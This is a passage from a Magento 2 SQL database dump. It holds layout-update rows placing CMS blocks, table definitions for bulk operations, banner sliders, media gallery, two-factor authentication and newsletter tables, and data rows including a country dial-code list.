(17, 'catalog_category_view_id_14', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"MJD3ANNaLdZfPClKaB8ooFJTZbuWWJ0L\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">20</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(18, 'catalog_category_view_id_16', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"YX1zzLBuVy3ToMLFgabtlkgGKeTuGkwE\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">21</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(19, 'catalog_category_view_id_8', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"mDBbo5ammEnSfthObnXmY3qu2n2IUdN7\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">22</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(20, 'catalog_category_view_id_43', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"B8psoqEHCwm0KhxRxdzk3d1DO3tZtD8H\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">24</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(21, 'catalog_category_view_id_42', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"Ssv3AhBKlfJ1OqaeqGBut01helylVLvL\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">23</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(22, 'cms_index_index', '<body><referenceContainer name=\"content\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"LoawcWVUfdpZ8bTbHGGYy4OFCCpbwJbW\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">25</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(23, 'catalog_category_view_id_44', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"ddTzF6cf0t483u2B0xk7GLfPIYorSvqN\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">26</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(24, 'catalog_category_view_id_45', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"aJNzJk8ZmW9ZLiX5LxlK8CHyg8oh3D0P\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">27</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(25, 'customer_account_login', '<body><referenceContainer name=\"customer.login.container\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"fAK7McOEVyy9k31sVlCwDEhBZM2AJKgy\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">29</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00'),
(26, 'catalog_category_view_id_', '<body><referenceContainer name=\"content.top\"><block class=\"Magento\\Cms\\Block\\Widget\\Block\" name=\"ZNTqSJDa4DbilzEjJzdQpmbDDOflVbyt\" template=\"widget/static_block/default.phtml\"><action method=\"setData\"><argument name=\"name\" xsi:type=\"string\">block_id</argument><argument name=\"value\" xsi:type=\"string\">28</argument></action></block></referenceContainer></body>', 0, '0000-00-00 00:00:00');

-- --------------------------------------------------------

--
-- Table structure for table `magento_acknowledged_bulk`
--

CREATE TABLE `magento_acknowledged_bulk` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Internal ID',
  `bulk_uuid` varbinary(39) DEFAULT NULL COMMENT 'Related Bulk UUID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Bulk that was viewed by user from notification area';

-- --------------------------------------------------------

--
-- Table structure for table `magento_bulk`
--

CREATE TABLE `magento_bulk` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Bulk Internal ID (must not be exposed)',
  `uuid` varbinary(39) DEFAULT NULL COMMENT 'Bulk UUID (can be exposed to reference bulk entity)',
  `user_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'ID of the WebAPI user that performed an action',
  `user_type` int(11) DEFAULT NULL COMMENT 'Which type of user',
  `description` varchar(255) DEFAULT NULL COMMENT 'Bulk Description',
  `operation_count` int(10) UNSIGNED NOT NULL COMMENT 'Total number of operations scheduled within this bulk',
  `start_time` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Bulk start time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Bulk entity that represents set of related asynchronous operations';

-- --------------------------------------------------------

--
-- Table structure for table `magento_operation`
--

CREATE TABLE `magento_operation` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Operation ID',
  `bulk_uuid` varbinary(39) DEFAULT NULL COMMENT 'Related Bulk UUID',
  `topic_name` varchar(255) DEFAULT NULL COMMENT 'Name of the related message queue topic',
  `serialized_data` blob DEFAULT NULL COMMENT 'Data (serialized) required to perform an operation',
  `result_serialized_data` blob DEFAULT NULL COMMENT 'Result data (serialized) after perform an operation',
  `status` smallint(6) DEFAULT 0 COMMENT 'Operation status (OPEN | COMPLETE | RETRIABLY_FAILED | NOT_RETRIABLY_FAILED)',
  `error_code` smallint(6) DEFAULT NULL COMMENT 'Code of the error that appeared during operation execution (used to aggregate related failed operations)',
  `result_message` varchar(255) DEFAULT NULL COMMENT 'Operation result message'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Operation entity';

-- --------------------------------------------------------

--
-- Table structure for table `mageplaza_bannerslider_banner`
--

CREATE TABLE `mageplaza_bannerslider_banner` (
  `banner_id` int(10) UNSIGNED NOT NULL COMMENT 'Banner ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Banner Name',
  `status` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Status',
  `type` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Banner Type',
  `content` text DEFAULT NULL COMMENT 'Custom html, css',
  `image` varchar(255) DEFAULT NULL COMMENT 'Banner Image',
  `url_banner` varchar(255) DEFAULT NULL COMMENT 'Banner Url',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `newtab` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Open tab',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Banner Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Banner Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Banner Table';

--
-- Dumping data for table `mageplaza_bannerslider_banner`
--

INSERT INTO `mageplaza_bannerslider_banner` (`banner_id`, `name`, `status`, `type`, `content`, `image`, `url_banner`, `title`, `newtab`, `created_at`, `updated_at`) VALUES
(1, 'slider1', 1, 0, NULL, 'b/i/bismoy.jpg', NULL, NULL, 1, '2020-08-02 15:11:29', '2020-08-28 05:51:22'),
(2, 'slider2', 1, 0, NULL, 's/l/slide-1-copy.jpg', NULL, 'bismoy_slider2', 0, '2020-08-22 04:35:49', '2020-08-22 04:35:49'),
(3, 'home_silider_middle', 1, 0, NULL, 's/l/slide-1-copy_1.jpg', NULL, 'home_silider_middle', 0, '2020-08-22 09:59:09', '2020-08-22 09:59:09'),
(4, 'home_silider_middle2', 1, 0, NULL, 'b/a/banner_6.png', NULL, NULL, 0, '2020-08-22 10:08:38', '2020-08-22 10:08:38');

-- --------------------------------------------------------

--
-- Table structure for table `mageplaza_bannerslider_banner_slider`
--

CREATE TABLE `mageplaza_bannerslider_banner_slider` (
  `slider_id` int(10) UNSIGNED NOT NULL COMMENT 'Slider ID',
  `banner_id` int(10) UNSIGNED NOT NULL COMMENT 'Banner ID',
  `position` int(11) NOT NULL DEFAULT 0 COMMENT 'Position'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Slider To Banner Link Table';

--
-- Dumping data for table `mageplaza_bannerslider_banner_slider`
--

INSERT INTO `mageplaza_bannerslider_banner_slider` (`slider_id`, `banner_id`, `position`) VALUES
(1, 1, 1),
(1, 2, 1),
(2, 3, 1),
(2, 4, 1);

-- --------------------------------------------------------

--
-- Table structure for table `mageplaza_bannerslider_slider`
--

CREATE TABLE `mageplaza_bannerslider_slider` (
  `slider_id` int(10) UNSIGNED NOT NULL COMMENT 'Slider ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Slider Name',
  `status` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Status',
  `location` text DEFAULT NULL COMMENT 'Location',
  `store_ids` varchar(255) DEFAULT NULL COMMENT 'Store_ids',
  `customer_group_ids` varchar(255) DEFAULT NULL COMMENT 'Customer_group_ids',
  `priority` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Priority',
  `effect` varchar(255) DEFAULT NULL COMMENT 'Animation effect',
  `autoWidth` smallint(6) DEFAULT NULL COMMENT 'Auto Width',
  `autoHeight` smallint(6) DEFAULT NULL COMMENT 'Auto Height',
  `design` smallint(6) NOT NULL DEFAULT 0 COMMENT 'Design',
  `loop` smallint(6) DEFAULT NULL COMMENT 'Loop slider',
  `lazyLoad` smallint(6) DEFAULT NULL COMMENT 'Lazyload image',
  `autoplay` smallint(6) DEFAULT NULL COMMENT 'Autoplay',
  `autoplayTimeout` varchar(255) DEFAULT '5000' COMMENT 'autoplay Timeout',
  `nav` smallint(6) DEFAULT NULL COMMENT 'Navigation',
  `dots` smallint(6) DEFAULT NULL COMMENT 'Dots',
  `is_responsive` smallint(6) DEFAULT NULL COMMENT 'Responsive',
  `responsive_items` varchar(255) DEFAULT NULL COMMENT 'Max Items Slider',
  `from_date` date DEFAULT NULL COMMENT 'From',
  `to_date` date DEFAULT NULL COMMENT 'To',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Slider Created At',
  `updated_at` timestamp NULL DEFAULT NULL COMMENT 'Slider Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Slider Table';

--
-- Dumping data for table `mageplaza_bannerslider_slider`
--

INSERT INTO `mageplaza_bannerslider_slider` (`slider_id`, `name`, `status`, `location`, `store_ids`, `customer_group_ids`, `priority`, `effect`, `autoWidth`, `autoHeight`, `design`, `loop`, `lazyLoad`, `autoplay`, `autoplayTimeout`, `nav`, `dots`, `is_responsive`, `responsive_items`, `from_date`, `to_date`, `created_at`, `updated_at`) VALUES
(1, 'home slider', 1, 'cms_index_index.page-top', '0', '0,1,2,3', 0, 'slider', NULL, NULL, 0, NULL, NULL, NULL, '5000', NULL, NULL, NULL, '[]', '2020-08-02', '2026-08-17', '2020-08-02 15:10:51', '2020-08-20 00:13:49'),
(2, 'home_page_middle', 1, 'custom.snippet-code', '0', '1', 0, 'slider', NULL, NULL, 0, NULL, NULL, NULL, '5000', NULL, NULL, NULL, '[]', '2020-08-22', NULL, '2020-08-22 09:49:46', '2020-08-22 09:49:46');

-- --------------------------------------------------------

--
-- Table structure for table `media_gallery_asset`
--

CREATE TABLE `media_gallery_asset` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `path` varchar(255) DEFAULT NULL COMMENT 'Path',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `source` varchar(255) DEFAULT NULL COMMENT 'Source',
  `content_type` varchar(255) DEFAULT NULL COMMENT 'Content Type',
  `width` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Width',
  `height` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Height',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Media Gallery Asset';

-- --------------------------------------------------------

--
-- Table structure for table `media_gallery_asset_keyword`
--

CREATE TABLE `media_gallery_asset_keyword` (
  `keyword_id` int(10) UNSIGNED NOT NULL COMMENT 'Keyword Id',
  `asset_id` int(10) UNSIGNED NOT NULL COMMENT 'Asset ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Media Gallery Asset Keyword';

-- --------------------------------------------------------

--
-- Table structure for table `media_gallery_keyword`
--

CREATE TABLE `media_gallery_keyword` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Keyword ID',
  `keyword` varchar(255) NOT NULL COMMENT 'Keyword'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Media Gallery Keyword';

-- --------------------------------------------------------

--
-- Table structure for table `msp_tfa_country_codes`
--

CREATE TABLE `msp_tfa_country_codes` (
  `msp_tfa_country_codes_id` int(10) UNSIGNED NOT NULL COMMENT 'TFA admin user ID',
  `code` text NOT NULL COMMENT 'Country code',
  `name` text NOT NULL COMMENT 'Country name',
  `dial_code` text NOT NULL COMMENT 'Prefix'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='msp_tfa_country_codes';

--
-- Dumping data for table `msp_tfa_country_codes`
--

INSERT INTO `msp_tfa_country_codes` (`msp_tfa_country_codes_id`, `code`, `name`, `dial_code`) VALUES
(1, 'IL', 'Israel', '+972'),
(2, 'AF', 'Afghanistan', '+93'),
(3, 'AL', 'Albania', '+355'),
(4, 'DZ', 'Algeria', '+213'),
(5, 'AS', 'AmericanSamoa', '+1 684'),
(6, 'AD', 'Andorra', '+376'),
(7, 'AO', 'Angola', '+244'),
(8, 'AI', 'Anguilla', '+1 264'),
(9, 'AG', 'Antigua and Barbuda', '+1268'),
(10, 'AR', 'Argentina', '+54'),
(11, 'AM', 'Armenia', '+374'),
(12, 'AW', 'Aruba', '+297'),
(13, 'AU', 'Australia', '+61'),
(14, 'AT', 'Austria', '+43'),
(15, 'AZ', 'Azerbaijan', '+994'),
(16, 'BS', 'Bahamas', '+1 242'),
(17, 'BH', 'Bahrain', '+973'),
(18, 'BD', 'Bangladesh', '+880'),
(19, 'BB', 'Barbados', '+1 246'),
(20, 'BY', 'Belarus', '+375'),
(21, 'BE', 'Belgium', '+32'),
(22, 'BZ', 'Belize', '+501'),
(23, 'BJ', 'Benin', '+229'),
(24, 'BM', 'Bermuda', '+1 441'),
(25, 'BT', 'Bhutan', '+975'),
(26, 'BA', 'Bosnia and Herzegovina', '+387'),
(27, 'BW', 'Botswana', '+267'),
(28, 'BR', 'Brazil', '+55'),
(29, 'IO', 'British Indian Ocean Territory', '+246'),
(30, 'BG', 'Bulgaria', '+359'),
(31, 'BF', 'Burkina Faso', '+226'),
(32, 'BI', 'Burundi', '+257'),
(33, 'KH', 'Cambodia', '+855'),
(34, 'CM', 'Cameroon', '+237'),
(35, 'CA', 'Canada', '+1'),
(36, 'CV', 'Cape Verde', '+238'),
(37, 'KY', 'Cayman Islands', '+ 345'),
(38, 'CF', 'Central African Republic', '+236'),
(39, 'TD', 'Chad', '+235'),
(40, 'CL', 'Chile', '+56'),
(41, 'CN', 'China', '+86'),
(42, 'CX', 'Christmas Island', '+61'),
(43, 'CO', 'Colombia', '+57'),
(44, 'KM', 'Comoros', '+269'),
(45, 'CG', 'Congo', '+242'),
(46, 'CK', 'Cook Islands', '+682'),
(47, 'CR', 'Costa Rica', '+506'),
(48, 'HR', 'Croatia', '+385'),
(49, 'CU', 'Cuba', '+53'),
(50, 'CY', 'Cyprus', '+537'),
(51, 'CZ', 'Czech Republic', '+420'),
(52, 'DK', 'Denmark', '+45'),
(53, 'DJ', 'Djibouti', '+253'),
(54, 'DM', 'Dominica', '+1 767'),
(55, 'DO', 'Dominican Republic', '+1 849'),
(56, 'EC', 'Ecuador', '+593'),
(57, 'EG', 'Egypt', '+20'),
(58, 'SV', 'El Salvador', '+503'),
(59, 'GQ', 'Equatorial Guinea', '+240'),
(60, 'ER', 'Eritrea', '+291'),
(61, 'EE', 'Estonia', '+372'),
(62, 'ET', 'Ethiopia', '+251'),
(63, 'FO', 'Faroe Islands', '+298'),
(64, 'FJ', 'Fiji', '+679'),
(65, 'FI', 'Finland', '+358'),
(66, 'FR', 'France', '+33'),
(67, 'GF', 'French Guiana', '+594'),
(68, 'PF', 'French Polynesia', '+689'),
(69, 'GA', 'Gabon', '+241'),
(70, 'GM', 'Gambia', '+220'),
(71, 'GE', 'Georgia', '+995'),
(72, 'DE', 'Germany', '+49'),
(73, 'GH', 'Ghana', '+233'),
(74, 'GI', 'Gibraltar', '+350'),
(75, 'GR', 'Greece', '+30'),
(76, 'GL', 'Greenland', '+299'),
(77, 'GD', 'Grenada', '+1 473'),
(78, 'GP', 'Guadeloupe', '+590'),
(79, 'GU', 'Guam', '+1 671'),
(80, 'GT', 'Guatemala', '+502'),
(81, 'GN', 'Guinea', '+224'),
(82, 'GW', 'Guinea-Bissau', '+245'),
(83, 'GY', 'Guyana', '+595'),
(84, 'HT', 'Haiti', '+509'),
(85, 'HN', 'Honduras', '+504'),
(86, 'HU', 'Hungary', '+36'),
(87, 'IS', 'Iceland', '+354'),
(88, 'IN', 'India', '+91'),
(89, 'ID', 'Indonesia', '+62'),
(90, 'IQ', 'Iraq', '+964'),
(91, 'IE', 'Ireland', '+353'),
(92, 'IL', 'Israel', '+972'),
(93, 'IT', 'Italy', '+39'),
(94, 'JM', 'Jamaica', '+1 876'),
(95, 'JP', 'Japan', '+81'),
(96, 'JO', 'Jordan', '+962'),
(97, 'KZ', 'Kazakhstan', '+7 7'),
(98, 'KE', 'Kenya', '+254'),
(99, 'KI', 'Kiribati', '+686'),
(100, 'KW', 'Kuwait', '+965'),
(101, 'KG', 'Kyrgyzstan', '+996'),
(102, 'LV', 'Latvia', '+371'),
(103, 'LB', 'Lebanon', '+961'),
(104, 'LS', 'Lesotho', '+266'),
(105, 'LR', 'Liberia', '+231'),
(106, 'LI', 'Liechtenstein', '+423'),
(107, 'LT', 'Lithuania', '+370'),
(108, 'LU', 'Luxembourg', '+352'),
(109, 'MG', 'Madagascar', '+261'),
(110, 'MW', 'Malawi', '+265'),
(111, 'MY', 'Malaysia', '+60'),
(112, 'MV', 'Maldives', '+960'),
(113, 'ML', 'Mali', '+223'),
(114, 'MT', 'Malta', '+356'),
(115, 'MH', 'Marshall Islands', '+692'),
(116, 'MQ', 'Martinique', '+596'),
(117, 'MR', 'Mauritania', '+222'),
(118, 'MU', 'Mauritius', '+230'),
(119, 'YT', 'Mayotte', '+262'),
(120, 'MX', 'Mexico', '+52'),
(121, 'MC', 'Monaco', '+377'),
(122, 'MN', 'Mongolia', '+976'),
(123, 'ME', 'Montenegro', '+382'),
(124, 'MS', 'Montserrat', '+1664'),
(125, 'MA', 'Morocco', '+212'),
(126, 'MM', 'Myanmar', '+95'),
(127, 'NA', 'Namibia', '+264'),
(128, 'NR', 'Nauru', '+674'),
(129, 'NP', 'Nepal', '+977'),
(130, 'NL', 'Netherlands', '+31'),
(131, 'AN', 'Netherlands Antilles', '+599'),
(132, 'NC', 'New Caledonia', '+687'),
(133, 'NZ', 'New Zealand', '+64'),
(134, 'NI', 'Nicaragua', '+505'),
(135, 'NE', 'Niger', '+227'),
(136, 'NG', 'Nigeria', '+234'),
(137, 'NU', 'Niue', '+683'),
(138, 'NF', 'Norfolk Island', '+672'),
(139, 'MP', 'Northern Mariana Islands', '+1 670'),
(140, 'NO', 'Norway', '+47'),
(141, 'OM', 'Oman', '+968'),
(142, 'PK', 'Pakistan', '+92'),
(143, 'PW', 'Palau', '+680'),
(144, 'PA', 'Panama', '+507'),
(145, 'PG', 'Papua New Guinea', '+675'),
(146, 'PY', 'Paraguay', '+595'),
(147, 'PE', 'Peru', '+51'),
(148, 'PH', 'Philippines', '+63'),
(149, 'PL', 'Poland', '+48'),
(150, 'PT', 'Portugal', '+351'),
(151, 'PR', 'Puerto Rico', '+1 939'),
(152, 'QA', 'Qatar', '+974'),
(153, 'RO', 'Romania', '+40'),
(154, 'RW', 'Rwanda', '+250'),
(155, 'WS', 'Samoa', '+685'),
(156, 'SM', 'San Marino', '+378'),
(157, 'SA', 'Saudi Arabia', '+966'),
(158, 'SN', 'Senegal', '+221'),
(159, 'RS', 'Serbia', '+381'),
(160, 'SC', 'Seychelles', '+248'),
(161, 'SL', 'Sierra Leone', '+232'),
(162, 'SG', 'Singapore', '+65'),
(163, 'SK', 'Slovakia', '+421'),
(164, 'SI', 'Slovenia', '+386'),
(165, 'SB', 'Solomon Islands', '+677'),
(166, 'ZA', 'South Africa', '+27'),
(167, 'GS', 'South Georgia and the South Sandwich Islands', '+500'),
(168, 'ES', 'Spain', '+34'),
(169, 'LK', 'Sri Lanka', '+94'),
(170, 'SD', 'Sudan', '+249'),
(171, 'SR', 'Suriname', '+597'),
(172, 'SZ', 'Swaziland', '+268'),
(173, 'SE', 'Sweden', '+46'),
(174, 'CH', 'Switzerland', '+41'),
(175, 'TJ', 'Tajikistan', '+992'),
(176, 'TH', 'Thailand', '+66'),
(177, 'TG', 'Togo', '+228'),
(178, 'TK', 'Tokelau', '+690'),
(179, 'TO', 'Tonga', '+676'),
(180, 'TT', 'Trinidad and Tobago', '+1 868'),
(181, 'TN', 'Tunisia', '+216'),
(182, 'TR', 'Turkey', '+90'),
(183, 'TM', 'Turkmenistan', '+993'),
(184, 'TC', 'Turks and Caicos Islands', '+1 649'),
(185, 'TV', 'Tuvalu', '+688'),
(186, 'UG', 'Uganda', '+256'),
(187, 'UA', 'Ukraine', '+380'),
(188, 'AE', 'United Arab Emirates', '+971'),
(189, 'GB', 'United Kingdom', '+44'),
(190, 'US', 'United States', '+1'),
(191, 'UY', 'Uruguay', '+598'),
(192, 'UZ', 'Uzbekistan', '+998'),
(193, 'VU', 'Vanuatu', '+678'),
(194, 'WF', 'Wallis and Futuna', '+681'),
(195, 'YE', 'Yemen', '+967'),
(196, 'ZM', 'Zambia', '+260'),
(197, 'ZW', 'Zimbabwe', '+263'),
(198, 'AX', 'land Islands', ''),
(199, 'BO', 'Bolivia, Plurinational State of', '+591'),
(200, 'BN', 'Brunei Darussalam', '+673'),
(201, 'CC', 'Cocos (Keeling) Islands', '+61'),
(202, 'CD', 'Congo, The Democratic Republic of the', '+243'),
(203, 'CI', 'Cote d\'Ivoire', '+225'),
(204, 'FK', 'Falkland Islands (Malvinas)', '+500'),
(205, 'GG', 'Guernsey', '+44'),
(206, 'VA', 'Holy See (Vatican City State)', '+379'),
(207, 'HK', 'Hong Kong', '+852'),
(208, 'IR', 'Iran, Islamic Republic of', '+98'),
(209, 'IM', 'Isle of Man', '+44'),
(210, 'JE', 'Jersey', '+44'),
(211, 'KP', 'Korea, Democratic People\'s Republic of', '+850'),
(212, 'KR', 'Korea, Republic of', '+82'),
(213, 'LA', 'Lao People\'s Democratic Republic', '+856'),
(214, 'LY', 'Libyan Arab Jamahiriya', '+218'),
(215, 'MO', 'Macao', '+853'),
(216, 'MK', 'Macedonia, The Former Yugoslav Republic of', '+389'),
(217, 'FM', 'Micronesia, Federated States of', '+691'),
(218, 'MD', 'Moldova, Republic of', '+373'),
(219, 'MZ', 'Mozambique', '+258'),
(220, 'PS', 'Palestinian Territory, Occupied', '+970'),
(221, 'PN', 'Pitcairn', '+872'),
(222, 'RE', 'Réunion', '+262'),
(223, 'RU', 'Russia', '+7'),
(224, 'BL', 'Saint Barthélemy', '+590'),
(225, 'SH', 'Saint Helena, Ascension and Tristan Da Cunha', '+290'),
(226, 'KN', 'Saint Kitts and Nevis', '+1 869'),
(227, 'LC', 'Saint Lucia', '+1 758'),
(228, 'MF', 'Saint Martin', '+590'),
(229, 'PM', 'Saint Pierre and Miquelon', '+508'),
(230, 'VC', 'Saint Vincent and the Grenadines', '+1 784'),
(231, 'ST', 'Sao Tome and Principe', '+239'),
(232, 'SO', 'Somalia', '+252'),
(233, 'SJ', 'Svalbard and Jan Mayen', '+47'),
(234, 'SY', 'Syrian Arab Republic', '+963'),
(235, 'TW', 'Taiwan, Province of China', '+886'),
(236, 'TZ', 'Tanzania, United Republic of', '+255'),
(237, 'TL', 'Timor-Leste', '+670'),
(238, 'VE', 'Venezuela, Bolivarian Republic of', '+58'),
(239, 'VN', 'Viet Nam', '+84'),
(240, 'VG', 'Virgin Islands, British', '+1 284'),
(241, 'VI', 'Virgin Islands, U.S.', '+1 340');

-- --------------------------------------------------------

--
-- Table structure for table `msp_tfa_trusted`
--

CREATE TABLE `msp_tfa_trusted` (
  `msp_tfa_trusted_id` int(10) UNSIGNED NOT NULL COMMENT 'Trusted device ID',
  `date_time` datetime NOT NULL COMMENT 'Date and time',
  `user_id` int(10) UNSIGNED NOT NULL COMMENT 'User ID',
  `device_name` text NOT NULL COMMENT 'Device name',
  `token` text NOT NULL COMMENT 'Token',
  `last_ip` text NOT NULL COMMENT 'Last IP'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='msp_tfa_trusted';

-- --------------------------------------------------------

--
-- Table structure for table `msp_tfa_user_config`
--

CREATE TABLE `msp_tfa_user_config` (
  `msp_tfa_user_config_id` int(10) UNSIGNED NOT NULL COMMENT 'TFA admin user ID',
  `user_id` int(10) UNSIGNED NOT NULL COMMENT 'User ID',
  `encoded_providers` text DEFAULT NULL COMMENT 'Encoded providers list',
  `encoded_config` text DEFAULT NULL COMMENT 'Encoded providers configuration',
  `default_provider` text DEFAULT NULL COMMENT 'Default provider'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='msp_tfa_user_config';

--
-- Dumping data for table `msp_tfa_user_config`
--

INSERT INTO `msp_tfa_user_config` (`msp_tfa_user_config_id`, `user_id`, `encoded_providers`, `encoded_config`, `default_provider`) VALUES
(1, 2, '[]', '0:3:5YjXJI3WhZkHSHTa4YU2Ys+TJXtNFDY8f74hkvf4', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `mview_state`
--

CREATE TABLE `mview_state` (
  `state_id` int(10) UNSIGNED NOT NULL COMMENT 'View State ID',
  `view_id` varchar(255) DEFAULT NULL COMMENT 'View ID',
  `mode` varchar(16) DEFAULT 'disabled' COMMENT 'View Mode',
  `status` varchar(16) DEFAULT 'idle' COMMENT 'View Status',
  `updated` datetime DEFAULT NULL COMMENT 'View updated time',
  `version_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'View Version ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='View State';

--
-- Dumping data for table `mview_state`
--

INSERT INTO `mview_state` (`state_id`, `view_id`, `mode`, `status`, `updated`, `version_id`) VALUES
(1, 'scconnector_google_remove', 'enabled', 'idle', '2021-06-15 12:10:55', 18915),
(2, 'scconnector_google_feed', 'enabled', 'idle', '2021-06-15 12:10:55', 44094);

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_problem`
--

CREATE TABLE `newsletter_problem` (
  `problem_id` int(10) UNSIGNED NOT NULL COMMENT 'Problem ID',
  `subscriber_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Subscriber ID',
  `queue_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Queue ID',
  `problem_error_code` int(10) UNSIGNED DEFAULT 0 COMMENT 'Problem Error Code',
  `problem_error_text` varchar(200) DEFAULT NULL COMMENT 'Problem Error Text'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Newsletter Problems';

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_queue`
--

CREATE TABLE `newsletter_queue` (
  `queue_id` int(10) UNSIGNED NOT NULL COMMENT 'Queue ID',
  `template_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Template ID',
  `newsletter_type` int(11) DEFAULT NULL COMMENT 'Newsletter Type',
  `newsletter_text` text DEFAULT NULL COMMENT 'Newsletter Text',
  `newsletter_styles` text DEFAULT NULL COMMENT 'Newsletter Styles',
  `newsletter_subject` varchar(200) DEFAULT NULL COMMENT 'Newsletter Subject',
  `newsletter_sender_name` varchar(200) DEFAULT NULL COMMENT 'Newsletter Sender Name',
  `newsletter_sender_email` varchar(200) DEFAULT NULL COMMENT 'Newsletter Sender Email',
  `queue_status` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Queue Status',
  `queue_start_at` timestamp NULL DEFAULT NULL COMMENT 'Queue Start At',
  `queue_finish_at` timestamp NULL DEFAULT NULL COMMENT 'Queue Finish At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Newsletter Queue';

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_queue_link`
--

CREATE TABLE `newsletter_queue_link` (
  `queue_link_id` int(10) UNSIGNED NOT NULL COMMENT 'Queue Link ID',
  `queue_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Queue ID',
  `subscriber_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Subscriber ID',
  `letter_sent_at` timestamp NULL DEFAULT NULL COMMENT 'Letter Sent At'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Newsletter Queue Link';

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_queue_store_link`
--

